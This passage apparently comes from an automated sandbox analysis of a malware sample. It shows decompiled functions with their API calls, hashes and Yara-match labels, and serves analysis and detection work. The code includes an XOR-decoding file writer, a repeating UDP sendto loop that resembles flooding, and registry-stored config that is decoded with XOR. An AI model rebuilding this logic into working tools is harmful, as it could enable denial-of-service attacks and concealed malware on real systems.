							if(_t36 < 0) {
								_t36 = (_t36 - 0x00000001 | 0xffffffe0) + 1;
							}
							asm("movaps xmm1, [0x4efe8f0]");
							_t53 = _t42 - _t36;
							_t37 = _t60;
							_v16 = _t56 - _t60;
							_t42 = _v12;
							do {
								asm("movups xmm0, [esi+eax]");
								_t37 = _t37 + 0x20;
								asm("pxor xmm0, xmm1");
								asm("movups [eax-0x20], xmm0");
								asm("movups xmm0, [edi+edx+0x10]");
								_t55 = _t55 + 0x20;
								asm("pxor xmm0, xmm1");
								asm("movups [eax-0x10], xmm0");
							} while (_t55 < _t53);
							_t60 = _v8;
						}
					}
					if(_t55 < _t42) {
						_t49 = _t55 + _t60;
						_t58 = _t56 - _t60;
						_t62 = _t42 - _t55;
						do {
							_t31 =  *((intOrPtr*)(_t49 + _t58));
							_t49 = _t49 + 1;
							 *(_t49 - 1) = _t31 ^ 0x00000058;
							_t62 = _t62 - 1;
						} while (_t62 != 0);
						_t60 = _v8;
					}
				}
				_t57 = _v24;
				WriteFile(_t57, _t60, _t42,  &_v20, 0);
				CloseHandle(_t57);
				return E04ED573F(_t60);
			}




























                                                                                    0x04ebb186
                                                                                    0x04ebb1a5
                                                                                    0x04ebb1ae
                                                                                    0x04ebb1b0
                                                                                    0x04ebb1ba
                                                                                    0x04ebb1c8
                                                                                    0x04ebb1d1
                                                                                    0x04ebb1d1
                                                                                    0x04ebb1d7
                                                                                    0x04ebb1d9
                                                                                    0x04ebb1e0
                                                                                    0x04ebb1e0
                                                                                    0x04ebb1e3
                                                                                    0x04ebb1e6
                                                                                    0x04ebb1e6
                                                                                    0x04ebb1ed
                                                                                    0x04ebb1ef
                                                                                    0x04ebb1f2
                                                                                    0x04ebb1f3
                                                                                    0x04ebb1fe
                                                                                    0x04ebb200
                                                                                    0x04ebb202
                                                                                    0x04ebb207
                                                                                    0x04ebb210
                                                                                    0x04ebb215
                                                                                    0x04ebb21a
                                                                                    0x04ebb21e
                                                                                    0x04ebb226
                                                                                    0x04ebb22b
                                                                                    0x04ebb231
                                                                                    0x04ebb231
                                                                                    0x04ebb232
                                                                                    0x04ebb23b
                                                                                    0x04ebb241
                                                                                    0x04ebb243
                                                                                    0x04ebb246
                                                                                    0x04ebb250
                                                                                    0x04ebb250
                                                                                    0x04ebb254
                                                                                    0x04ebb257
                                                                                    0x04ebb25b
                                                                                    0x04ebb25f
                                                                                    0x04ebb264
                                                                                    0x04ebb267
                                                                                    0x04ebb26b
                                                                                    0x04ebb26f
                                                                                    0x04ebb273
                                                                                    0x04ebb273
                                                                                    0x04ebb21e
                                                                                    0x04ebb278
                                                                                    0x04ebb27a
                                                                                    0x04ebb27d
                                                                                    0x04ebb281
                                                                                    0x04ebb283
                                                                                    0x04ebb283
                                                                                    0x04ebb286
                                                                                    0x04ebb28b
                                                                                    0x04ebb28e
                                                                                    0x04ebb28e
                                                                                    0x04ebb293
                                                                                    0x04ebb293
                                                                                    0x04ebb278
                                                                                    0x04ebb296
                                                                                    0x04ebb2a2
                                                                                    0x04ebb2a9
                                                                                    0x04ebb2be

                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(-0000020E,40000000,00000002,00000000,00000004,00000080,00000000), ref: 04EBB1A8
                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 04EBB1BD
                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 04EBB1D1
                                                                                    • WriteFile.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 04EBB2A2
                                                                                    • CloseHandle.KERNEL32(?), ref: 04EBB2A9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: File$CloseCreateHandlePointerSizeWrite
                                                                                    • String ID:
                                                                                    • API String ID: 1886887421-3916222277
                                                                                    • Opcode ID: a830d12ec9bc94ce7e4c27c31ddb49c050a7a48c01dacb4eeeef753fe1f6482d
                                                                                    • Instruction ID: 6f424ec599cd875a3340065a8f964c66c9b60bebbedcc46a78e0b9821d3ad31f
                                                                                    • Opcode Fuzzy Hash: a830d12ec9bc94ce7e4c27c31ddb49c050a7a48c01dacb4eeeef753fe1f6482d
                                                                                    • Instruction Fuzzy Hash: A9412871A002099FDB10DF68CD85BBEB7A5EF89308F148268E945AB245E770B945C790
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ED21E0, Relevance: 10.6, APIs: 7, Instructions: 104memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 63%
                                                                                    			E04ED21E0(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi) {
				void* __esi;
				void* _t38;
				void* _t44;
				void* _t53;
				void* _t55;
				LONG* _t68;
				void* _t69;
				intOrPtr* _t77;
				void* _t80;
				LONG* _t81;

				_t62 = __ebx;
				_t77 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x54)) == 3) {
					L12:
					 *((intOrPtr*)(_t77 + 0x58)) = 1;
					SetLastError(0x139f);
					__eflags = 0;
					return 0;
				} else {
					E04ECE8D0(__ecx + 0x174);
					_t38 =  *((intOrPtr*)( *__ecx + 0x2c))();
					_t85 = _t38;
					if(_t38 == 0) {
						 *(__ecx + 0x174) = 0;
						goto L12;
					} else {
						 *((intOrPtr*)(__ecx + 0x54)) = 2;
						 *(__ecx + 0x174) = 0;
						E04ED2390(__ecx, _t85);
						E04ED2F90(__ebx, _t77, _t77, _t80);
						_t68 = _t77;
						E04ED3000(__ebx, _t68, _t77, _t80);
						if( *((intOrPtr*)(_t77 + 0x23c)) != 0) {
							_push(0x80004005);
							E04EB7AB0();
							goto L14;
						} else {
							_t69 = _t77 + 0x178;
							if( *((intOrPtr*)(_t77 + 0x17c)) != 0) {
								E04EC03D0(_t69, _t80);
							}
							 *((intOrPtr*)( *_t77 + 0xf4))();
							E04ED4920(_t77 + 0x2b4, _t77);
							_t68 = _t77 + 0x378;
							E04ED5490(_t68,  *((intOrPtr*)(_t77 + 0x1c)), 1);
							if( *((intOrPtr*)(_t77 + 0x37c)) != 0) {
								L14:
								_push(0x80004005);
								E04EB7AB0();
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_push(_t80);
								_t81 = _t68;
								_t44 =  *(_t81 + 0x84);
								__eflags = _t44;
								if(_t44 != 0) {
									HeapDestroy(_t44);
								}
								 *(_t81 + 0x84) = HeapCreate( *(_t81 + 0x88),  *(_t81 + 0x8c),  *(_t81 + 0x90));
								asm("xorps xmm0, xmm0");
								asm("movups [esi+0x5c], xmm0");
								asm("movq [esi+0x6c], xmm0");
								 *(_t81 + 0x74) = 0;
								 *(_t81 + 0x40) = 0;
								 *(_t81 + 0x44) = 0;
								 *((intOrPtr*)(_t81 + 0x54)) = 3;
								return SetEvent( *(_t81 + 0x3c));
							} else {
								E04EC0460(_t62, _t77 + 0xb0);
								_t53 =  *(_t77 + 0x94);
								if(_t53 != 0) {
									HeapDestroy(_t53);
								}
								 *(_t77 + 0x94) = HeapCreate( *(_t77 + 0x98),  *(_t77 + 0x9c),  *(_t77 + 0xa0));
								_t55 =  *(_t77 + 0x50);
								if(_t55 != 0) {
									CloseHandle(_t55);
									 *(_t77 + 0x50) = 0;
								}
								 *((intOrPtr*)( *_t77 + 0x120))();
								return 1;
							}
						}
					}
				}
			}













                                                                                    0x04ed21e0
                                                                                    0x04ed21e2
                                                                                    0x04ed21e8
                                                                                    0x04ed22ef
                                                                                    0x04ed22f4
                                                                                    0x04ed22fb
                                                                                    0x04ed2302
                                                                                    0x04ed2305
                                                                                    0x04ed21ee
                                                                                    0x04ed21f4
                                                                                    0x04ed21fd
                                                                                    0x04ed2200
                                                                                    0x04ed2202
                                                                                    0x04ed22e5
                                                                                    0x00000000
                                                                                    0x04ed2208
                                                                                    0x04ed2208
                                                                                    0x04ed2211
                                                                                    0x04ed221b
                                                                                    0x04ed2222
                                                                                    0x04ed2227
                                                                                    0x04ed2229
                                                                                    0x04ed2235
                                                                                    0x04ed2306
                                                                                    0x04ed230b
                                                                                    0x00000000
                                                                                    0x04ed223b
                                                                                    0x04ed2242
                                                                                    0x04ed2248
                                                                                    0x04ed224a
                                                                                    0x04ed224a
                                                                                    0x04ed2253
                                                                                    0x04ed225f
                                                                                    0x04ed2267
                                                                                    0x04ed226f
                                                                                    0x04ed227e
                                                                                    0x04ed2310
                                                                                    0x04ed2310
                                                                                    0x04ed2315
                                                                                    0x04ed231a
                                                                                    0x04ed231b
                                                                                    0x04ed231c
                                                                                    0x04ed231d
                                                                                    0x04ed231e
                                                                                    0x04ed231f
                                                                                    0x04ed2320
                                                                                    0x04ed2321
                                                                                    0x04ed2323
                                                                                    0x04ed2329
                                                                                    0x04ed232b
                                                                                    0x04ed232e
                                                                                    0x04ed232e
                                                                                    0x04ed234c
                                                                                    0x04ed2352
                                                                                    0x04ed2355
                                                                                    0x04ed2359
                                                                                    0x04ed235e
                                                                                    0x04ed2368
                                                                                    0x04ed236f
                                                                                    0x04ed2376
                                                                                    0x04ed2384
                                                                                    0x04ed2284
                                                                                    0x04ed228a
                                                                                    0x04ed228f
                                                                                    0x04ed2297
                                                                                    0x04ed229a
                                                                                    0x04ed229a
                                                                                    0x04ed22b8
                                                                                    0x04ed22be
                                                                                    0x04ed22c3
                                                                                    0x04ed22c6
                                                                                    0x04ed22cc
                                                                                    0x04ed22cc
                                                                                    0x04ed22d7
                                                                                    0x04ed22e4
                                                                                    0x04ed22e4
                                                                                    0x04ed227e
                                                                                    0x04ed2235
                                                                                    0x04ed2202

                                                                                    APIs
                                                                                    • SetLastError.KERNEL32(0000139F,?,00000000,04EBF876), ref: 04ED22FB
                                                                                      • Part of subcall function 04ECE8D0: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 04ECE8E5
                                                                                      • Part of subcall function 04ECE8D0: SwitchToThread.KERNEL32(?,?,00000000,04ECE352,?,00000000,04EB8415,74E5F5E0,00000004,80004005,80004005,80004005,80004005,80004005,?,04EB87E8), ref: 04ECE8FD
                                                                                    • HeapDestroy.KERNEL32(?), ref: 04ED229A
                                                                                    • HeapCreate.KERNEL32(?,?,?), ref: 04ED22B2
                                                                                    • CloseHandle.KERNEL32(?), ref: 04ED22C6
                                                                                    • HeapDestroy.KERNEL32(?,00000000,80004005,80004005), ref: 04ED232E
                                                                                    • HeapCreate.KERNEL32(?,?,?,00000000,80004005,80004005), ref: 04ED2346
                                                                                    • SetEvent.KERNEL32(80004005), ref: 04ED237D
                                                                                      • Part of subcall function 04ED3000: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000), ref: 04ED3039
                                                                                      • Part of subcall function 04ED3000: WaitForMultipleObjects.KERNEL32(00000040,?,00000001,000000FF), ref: 04ED308C
                                                                                      • Part of subcall function 04ED3000: CloseHandle.KERNEL32(?,?,00000001,000000FF), ref: 04ED30A3
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$CloseCreateDestroyHandle$CompareCompletionErrorEventExchangeInterlockedLastMultipleObjectsPostQueuedStatusSwitchThreadWait
                                                                                    • String ID:
                                                                                    • API String ID: 1858100233-0
                                                                                    • Opcode ID: 2461fc54e6186ae397fe7f2c9d5185597050cc21309906f3b86455f1670fb1fe
                                                                                    • Instruction ID: a9f1b86c879a3b7e58402517570765e6a0ddd7a61a1e2b4247ec747c60abed7f
                                                                                    • Opcode Fuzzy Hash: 2461fc54e6186ae397fe7f2c9d5185597050cc21309906f3b86455f1670fb1fe
                                                                                    • Instruction Fuzzy Hash: 76416D31200A02EFE718DF35D948BEAF7B5FF44309F04551DE65A82640DB74B566CB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB3EF0, Relevance: 10.6, APIs: 7, Instructions: 101networksleepCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 37%
                                                                                    			E04EB3EF0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v22;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _t47;
				signed int _t51;
				long _t56;
				intOrPtr _t57;
				intOrPtr _t66;
				struct _CRITICAL_SECTION* _t78;
				intOrPtr _t81;
				signed int _t82;

				_t47 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t47 ^ _t82;
				_t81 = _a4;
				_v24 = 2;
				_t67 =  *((intOrPtr*)(_t81 + 4));
				_v20 =  *((intOrPtr*)(_t67 + 0xc));
				_t51 =  *(_t67 + 0x10) & 0x0000ffff;
				__imp__#9(_t51);
				_v22 = _t51;
				__imp__#23(2, 2, 0);
				_t65 = _t51;
				_v36 = _t51;
				if( *((char*)(_t81 + 1)) != 0) {
					do {
						_v32 = 0;
						if( *((intOrPtr*)( *((intOrPtr*)(_t81 + 4)) + 0x24)) > 0) {
							do {
								_t66 =  *((intOrPtr*)(_t81 + 4));
								if( *((short*)(_t66 + 0x16)) != 3) {
									_t57 =  *((intOrPtr*)(_t66 + 0x1c));
									_v28 = _t57;
									if(_t57 !=  *((intOrPtr*)(_t66 + 0x18))) {
										_t79 =  *((intOrPtr*)(_t66 + 0x18));
										_t57 =  *((intOrPtr*)(_t66 + 0x18)) + E04EDEB76(_t67) % ( *((intOrPtr*)(_t66 + 0x1c)) - _t79 + 1);
										goto L7;
									}
								} else {
									_t57 =  *((intOrPtr*)(_t66 + 0x34));
									L7:
									_v28 = _t57;
								}
								_t67 =  &_v24;
								_t65 = _v36;
								__imp__#20(_v36,  *((intOrPtr*)(_t66 + 0x3c)), _t57, 0,  &_v24, 0x10);
								if(_t57 != 0xffffffff) {
									goto L9;
								}
								goto L12;
								L9:
								if( *((intOrPtr*)( *((intOrPtr*)(_t81 + 4)) + 8)) != 0) {
									_t78 = _t81 + 0x3c;
									EnterCriticalSection(_t78);
									asm("cdq");
									 *((intOrPtr*)(_t81 + 0x18)) =  *((intOrPtr*)(_t81 + 0x18)) + _v28 + 0x2e;
									asm("adc [esi+0x1c], edx");
									 *((intOrPtr*)(_t81 + 0x10)) =  *((intOrPtr*)(_t81 + 0x10)) + 1;
									asm("adc dword [esi+0x14], 0x0");
									LeaveCriticalSection(_t78);
								}
								_t67 = _v32 + 1;
								_v32 = _t67;
							} while (_t67 <  *((intOrPtr*)( *((intOrPtr*)(_t81 + 4)) + 0x24)));
						}
						L12:
						_t56 =  *( *((intOrPtr*)(_t81 + 4)) + 0x28);
						if(_t56 != 0) {
							Sleep(_t56);
						}
					} while ( *((char*)(_t81 + 1)) != 0);
				}
				__imp__#3();
				return E04ED572E(_v8 ^ _t82, _t65);
			}


















                                                                                    0x04eb3ef6
                                                                                    0x04eb3efd
                                                                                    0x04eb3f02
                                                                                    0x04eb3f0a
                                                                                    0x04eb3f0e
                                                                                    0x04eb3f14
                                                                                    0x04eb3f17
                                                                                    0x04eb3f1c
                                                                                    0x04eb3f28
                                                                                    0x04eb3f2c
                                                                                    0x04eb3f36
                                                                                    0x04eb3f38
                                                                                    0x04eb3f3b
                                                                                    0x04eb3f42
                                                                                    0x04eb3f45
                                                                                    0x04eb3f50
                                                                                    0x04eb3f56
                                                                                    0x04eb3f56
                                                                                    0x04eb3f5e
                                                                                    0x04eb3f65
                                                                                    0x04eb3f68
                                                                                    0x04eb3f6e
                                                                                    0x04eb3f70
                                                                                    0x04eb3f82
                                                                                    0x00000000
                                                                                    0x04eb3f82
                                                                                    0x04eb3f60
                                                                                    0x04eb3f60
                                                                                    0x04eb3f85
                                                                                    0x04eb3f85
                                                                                    0x04eb3f85
                                                                                    0x04eb3f8a
                                                                                    0x04eb3f94
                                                                                    0x04eb3f98
                                                                                    0x04eb3fa1
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb3fa3
                                                                                    0x04eb3faa
                                                                                    0x04eb3fac
                                                                                    0x04eb3fb0
                                                                                    0x04eb3fbc
                                                                                    0x04eb3fbd
                                                                                    0x04eb3fc1
                                                                                    0x04eb3fc4
                                                                                    0x04eb3fc8
                                                                                    0x04eb3fcc
                                                                                    0x04eb3fcc
                                                                                    0x04eb3fd8
                                                                                    0x04eb3fd9
                                                                                    0x04eb3fdc
                                                                                    0x04eb3f56
                                                                                    0x04eb3fe5
                                                                                    0x04eb3fe8
                                                                                    0x04eb3fed
                                                                                    0x04eb3ff0
                                                                                    0x04eb3ff0
                                                                                    0x04eb3ff6
                                                                                    0x04eb4000
                                                                                    0x04eb4002
                                                                                    0x04eb4019

                                                                                    APIs
                                                                                    • htons.WS2_32(?), ref: 04EB3F1C
                                                                                    • socket.WS2_32(00000002,00000002,00000000), ref: 04EB3F2C
                                                                                    • sendto.WS2_32(?,?,?,00000000,?,00000010), ref: 04EB3F98
                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 04EB3FB0
                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 04EB3FCC
                                                                                    • Sleep.KERNEL32(?), ref: 04EB3FF0
                                                                                    • closesocket.WS2_32(00000000), ref: 04EB4002
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterLeaveSleepclosesockethtonssendtosocket
                                                                                    • String ID:
                                                                                    • API String ID: 920770778-0
                                                                                    • Opcode ID: 6d43b95af3eb13a539c5a6403b29ea7138a4a41df24a6206a3afc864f5823135
                                                                                    • Instruction ID: 61dedab01f177c45526ebbd99347c8d888059318c134176f35911cb676d9bb8a
                                                                                    • Opcode Fuzzy Hash: 6d43b95af3eb13a539c5a6403b29ea7138a4a41df24a6206a3afc864f5823135
                                                                                    • Instruction Fuzzy Hash: 39417770A00204AFDB24CFA4C98ABABB7F5FF48304F00950AE8969B681D774FD45CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ECAC30, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 93registryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 91%
                                                                                    			E04ECAC30(void* __ebx, char* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				char _v88;
				short _v608;
				void* _v612;
				int _v616;
				int _v620;
				signed int _t25;
				int _t52;
				void* _t55;
				void* _t56;
				char* _t64;
				signed int _t65;

				_t60 = __edi;
				_t25 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t25 ^ _t65;
				_t64 = __ecx;
				E04EDDAD0(__edi, __ecx, 0, 0x190);
				_v616 = 0x190;
				E04EC6010(__ebx, L"Global",  &_v88, _t60, _t64);
				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
				E04EDDAD0(0, _t64, 0, _v616);
				_v612 = 0;
				if(RegOpenKeyExW(0x80000002,  &_v608, 0, 0x20119,  &_v612) != 0) {
					L8:
					return E04ED572E(_v8 ^ _t65);
				} else {
					RegQueryValueExW(_v612, "2", 0,  &_v620, _t64,  &_v616);
					_t62 =  ==  ? 1 : 0;
					RegCloseKey(_v612);
					_t71 =  ==  ? 1 : 0;
					if(( ==  ? 1 : 0) == 0) {
						goto L8;
					} else {
						_t52 = _v616;
						if(_t52 > 1) {
							_t55 = _t52 - 1;
							 *(_t55 + _t64) =  *(_t55 + _t64) ^  *_t64;
							_t56 = _t55 - 1;
							while(_t56 != 0) {
								 *(_t56 + _t64) =  *(_t56 + _t64) ^  *(_t56 +  &(_t64[1]));
								_t56 = _t56 - 1;
							}
							 *(_t56 + _t64) =  *(_t56 + _t64) ^ (_t56 + _t64)[0];
						}
						return E04ED572E(_v8 ^ _t65);
					}
				}
			}















                                                                                    0x04ecac30
                                                                                    0x04ecac39
                                                                                    0x04ecac40
                                                                                    0x04ecac4b
                                                                                    0x04ecac50
                                                                                    0x04ecac58
                                                                                    0x04ecac67
                                                                                    0x04ecac7c
                                                                                    0x04ecac8c
                                                                                    0x04ecac94
                                                                                    0x04ecacbb
                                                                                    0x04ecad36
                                                                                    0x04ecad48
                                                                                    0x04ecacbd
                                                                                    0x04ecacd8
                                                                                    0x04ecaceb
                                                                                    0x04ecacee
                                                                                    0x04ecacf4
                                                                                    0x04ecacf6
                                                                                    0x00000000
                                                                                    0x04ecacf8
                                                                                    0x04ecacf8
                                                                                    0x04ecad00
                                                                                    0x04ecad04
                                                                                    0x04ecad05
                                                                                    0x04ecad08
                                                                                    0x04ecad0a
                                                                                    0x04ecad14
                                                                                    0x04ecad17
                                                                                    0x04ecad17
                                                                                    0x04ecad21
                                                                                    0x04ecad21
                                                                                    0x04ecad35
                                                                                    0x04ecad35
                                                                                    0x04ecacf6

                                                                                    APIs
                                                                                      • Part of subcall function 04EC6010: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,00000378), ref: 04EC61B1
                                                                                      • Part of subcall function 04EC6010: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 04EC61DF
                                                                                      • Part of subcall function 04EC6010: RegCloseKey.ADVAPI32(?), ref: 04EC61F5
                                                                                    • wsprintfW.USER32 ref: 04ECAC7C
                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?), ref: 04ECACB3
                                                                                    • RegQueryValueExW.ADVAPI32(?,04EFD124,00000000,?,?,?), ref: 04ECACD8
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 04ECACEE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseOpenQueryValue$wsprintf
                                                                                    • String ID: Global$SOFTWARE\Classes\CLSID\%s
                                                                                    • API String ID: 3615287298-1865207932
                                                                                    • Opcode ID: 7640e5219a8ce9ef4090fad2d5f1bffb8062191dc8a7581cd9e134921eaf299a
                                                                                    • Instruction ID: 0d7e2a6cb59a6e421bd8a6a8bc0b4809bda3e4faeb0a2e22f97bdefb5fbe3132
                                                                                    • Opcode Fuzzy Hash: 7640e5219a8ce9ef4090fad2d5f1bffb8062191dc8a7581cd9e134921eaf299a
                                                                                    • Instruction Fuzzy Hash: 6D31083160421CABDB209F64DD48FEFBBB9EF89309F5011EDE90A9B101D6726E45CB50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ECAB10, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 93registryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 91%
                                                                                    			E04ECAB10(void* __ebx, char* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				char _v88;
				short _v608;
				void* _v612;
				int _v616;
				int _v620;
				signed int _t25;
				int _t52;
				void* _t55;
				void* _t56;
				char* _t64;
				signed int _t65;

				_t60 = __edi;
				_t25 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t25 ^ _t65;
				_t64 = __ecx;
				E04EDDAD0(__edi, __ecx, 0, 0x190);
				_v616 = 0x190;
				E04EC6010(__ebx, L"Global",  &_v88, _t60, _t64);
				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
				E04EDDAD0(0, _t64, 0, _v616);
				_v612 = 0;
				if(RegOpenKeyExW(0x80000002,  &_v608, 0, 0x20119,  &_v612) != 0) {
					L8:
					return E04ED572E(_v8 ^ _t65);
				} else {
					RegQueryValueExW(_v612, "3", 0,  &_v620, _t64,  &_v616);
					_t62 =  ==  ? 1 : 0;
					RegCloseKey(_v612);
					_t71 =  ==  ? 1 : 0;
					if(( ==  ? 1 : 0) == 0) {
						goto L8;
					} else {
						_t52 = _v616;
						if(_t52 > 1) {
							_t55 = _t52 - 1;
							 *(_t55 + _t64) =  *(_t55 + _t64) ^  *_t64;
							_t56 = _t55 - 1;
							while(_t56 != 0) {
								 *(_t56 + _t64) =  *(_t56 + _t64) ^  *(_t56 +  &(_t64[1]));
								_t56 = _t56 - 1;
							}
							 *(_t56 + _t64) =  *(_t56 + _t64) ^ (_t56 + _t64)[0];
						}
						return E04ED572E(_v8 ^ _t65);
					}
				}
			}















                                                                                    0x04ecab10
                                                                                    0x04ecab19
                                                                                    0x04ecab20
                                                                                    0x04ecab2b
                                                                                    0x04ecab30
                                                                                    0x04ecab38
                                                                                    0x04ecab47
                                                                                    0x04ecab5c
                                                                                    0x04ecab6c
                                                                                    0x04ecab74
                                                                                    0x04ecab9b
                                                                                    0x04ecac16
                                                                                    0x04ecac28
                                                                                    0x04ecab9d
                                                                                    0x04ecabb8
                                                                                    0x04ecabcb
                                                                                    0x04ecabce
                                                                                    0x04ecabd4
                                                                                    0x04ecabd6
                                                                                    0x00000000
                                                                                    0x04ecabd8
                                                                                    0x04ecabd8
                                                                                    0x04ecabe0
                                                                                    0x04ecabe4
                                                                                    0x04ecabe5
                                                                                    0x04ecabe8
                                                                                    0x04ecabea
                                                                                    0x04ecabf4
                                                                                    0x04ecabf7
                                                                                    0x04ecabf7
                                                                                    0x04ecac01
                                                                                    0x04ecac01
                                                                                    0x04ecac15
                                                                                    0x04ecac15
                                                                                    0x04ecabd6

                                                                                    APIs
                                                                                      • Part of subcall function 04EC6010: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,00000378), ref: 04EC61B1
                                                                                      • Part of subcall function 04EC6010: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 04EC61DF
                                                                                      • Part of subcall function 04EC6010: RegCloseKey.ADVAPI32(?), ref: 04EC61F5
                                                                                    • wsprintfW.USER32 ref: 04ECAB5C
                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?), ref: 04ECAB93
                                                                                    • RegQueryValueExW.ADVAPI32(?,04EFD120,00000000,?,?,?), ref: 04ECABB8
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 04ECABCE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseOpenQueryValue$wsprintf
                                                                                    • String ID: Global$SOFTWARE\Classes\CLSID\%s
                                                                                    • API String ID: 3615287298-1865207932
                                                                                    • Opcode ID: a131217ef19d2ab439bd7b784df14e30c911aed44ea955199700f8cf23824239
                                                                                    • Instruction ID: 77c63de5496dafb19ce8b4419d7134b714e551c354b2af1e1a1c5def43009721
                                                                                    • Opcode Fuzzy Hash: a131217ef19d2ab439bd7b784df14e30c911aed44ea955199700f8cf23824239
                                                                                    • Instruction Fuzzy Hash: F531E83560421CAFDB209F64DD88FEEBBB9EF88304F5011EDE94A9B101D6326E45CB50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC19F0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 92synchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 63%
                                                                                    			E04EC19F0(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v12;
				void* _v84;
				char _v88;
				intOrPtr _v92;
				char _v96;
				signed int _t29;
				intOrPtr _t31;
				void* _t32;
				struct HICON__* _t34;
				void* _t35;
				intOrPtr _t36;
				intOrPtr _t39;
				intOrPtr* _t45;
				struct HICON__** _t51;
				signed int _t53;
				signed int _t55;

				_t29 =  *0x4f03008; // 0x3d21fb31
				_v12 = _t29 ^ _t55;
				_t31 = _a4;
				_t45 = __ecx;
				 *__ecx = 0x4efd8b0;
				 *((intOrPtr*)(__ecx + 4)) = _t31;
				 *((intOrPtr*)(_t31 + 0x38)) = __ecx;
				_t32 = CreateEventW(0, 1, 0, 0);
				asm("movaps xmm0, [0x4efe8b0]");
				_t51 = _t45 + 0x70;
				asm("movups [ebp-0x4c], xmm0");
				_t53 = 0;
				 *(_t45 + 8) = _t32;
				asm("movaps xmm0, [0x4efe8a0]");
				asm("movups [ebp-0x3c], xmm0");
				 *_t45 = 0x4efdca4;
				asm("movaps xmm0, [0x4efe890]");
				asm("movups [ebp-0x2c], xmm0");
				 *((intOrPtr*)(_t45 + 0x2c)) = 0x4efdc9c;
				asm("movaps xmm0, [0x4efe880]");
				asm("movups [ebp-0x1c], xmm0");
				do {
					 *(_t51 - 0x40) =  *(_t55 + _t53 * 4 - 0x4c);
					_t34 = LoadCursorW(0,  *(_t55 + _t53 * 4 - 0x4c));
					_t53 = _t53 + 1;
					 *_t51 = _t34;
					_t51 =  &(_t51[1]);
					_t58 = _t53 - 0x10;
				} while (_t53 < 0x10);
				 *((char*)(_t45 + 0x18)) = 2;
				 *((intOrPtr*)(_t45 + 0x20)) = 0x20;
				_t35 = E04ED5744(_t53, _t58, 0x108);
				_push(0);
				_t36 = E04EC23B0(_t45, _t35, _t51, _t53);
				asm("movsd xmm0, [0x4efe870]");
				 *((intOrPtr*)(_t45 + 0xb0)) = _t36;
				 *((char*)(_t45 + 0xc)) = 1;
				 *(_t45 + 0x14) = 0;
				 *(_t45 + 0x10) = 0;
				 *(_t45 + 0x1c) = 0;
				asm("movsd [ebx+0xb8], xmm0");
				_v96 = E04EC2010;
				_v92 = _t45;
				_v88 = 1;
				_v84 = CreateEventW(0, 0, 0, 0);
